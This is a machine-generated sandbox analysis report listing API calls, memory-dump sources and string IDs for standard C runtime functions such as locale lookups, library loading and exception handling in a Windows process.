                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3939093798-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1443284424-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: %
                                                                                                                                                                      • API String ID: 3668304517-2567322570
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocaletry_get_function
                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                      • API String ID: 2200034068-2904428671
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF686061FB0
                                                                                                                                                                        • Part of subcall function 00007FF686065FD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686065FED
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF686061FF9
                                                                                                                                                                        • Part of subcall function 00007FF686065FD0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF686066046
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6860620C4
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocale$ErrorLast_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3644580040-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32 ref: 00007FF6860621F8
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF6860625C7,?,00000000,00000092,?,?,00000000,?,00007FF686053865), ref: 00007FF686061E7A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,00007FF686062141), ref: 00007FF6860623CF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: GetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AA8B
                                                                                                                                                                        • Part of subcall function 00007FF68605AA7C: SetLastError.KERNEL32(?,?,?,00007FF68604FD01,?,?,7FFFFFFFFFFFFFFF,00007FF686041C2A), ref: 00007FF68605AB29
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF686062583,?,00000000,00000092,?,?,00000000,?,00007FF686053865), ref: 00007FF686061F2A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF68605EDED,?,?,?,?,?,?,?,?,00000000,00007FF686061428), ref: 00007FF68605E9FB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: EnumLocalesSystem
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2099609381-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HeapProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F2B7
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F2D6
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: GetProcAddress.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EB80
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F2F5
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: LoadLibraryW.KERNELBASE(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EACB
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: GetLastError.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EAD9
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: LoadLibraryExW.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EB1B
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F314
                                                                                                                                                                        • Part of subcall function 00007FF68605EA28: FreeLibrary.KERNEL32(?,?,00000005,00007FF68605EF06,?,?,8000000000000000,00007FF68605AC42,?,?,8000000000000000,00007FF686056A2D), ref: 00007FF68605EB54
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F333
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F352
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F371
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F390
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F3AF
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF68605F3CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                      • API String ID: 3255926029-3252031757
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID: [!] PAUSE$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 2081738530-3229271104
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 459529453-1866435925
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name$false$true
                                                                                                                                                                      • API String ID: 4121308752-1062449267
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Frame$BlockEstablisherHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3606184308-393685449
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F94F
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F95D
                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F987
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F9CD
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF68604FB7A,?,?,?,00007FF68604F7F4,?,?,?,?,00007FF68604B8CD), ref: 00007FF68604F9D9
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                      • API String ID: 2559590344-2084034818
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                      • String ID: CONOUT$
                                                                                                                                                                      • API String ID: 3230265001-3130406586
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiStringWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2829165498-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2081738530-0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                      • API String ID: 3523768491-393685449
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name
                                                                                                                                                                      • API String ID: 2967684691-1405518554
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                      • API String ID: 4061214504-1276376045
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
• Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp
• Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp
• Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF6860634F6
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF686063473,?,?,FFFFFFFE,00007FF686063EB2), ref: 00007FF6860635B4
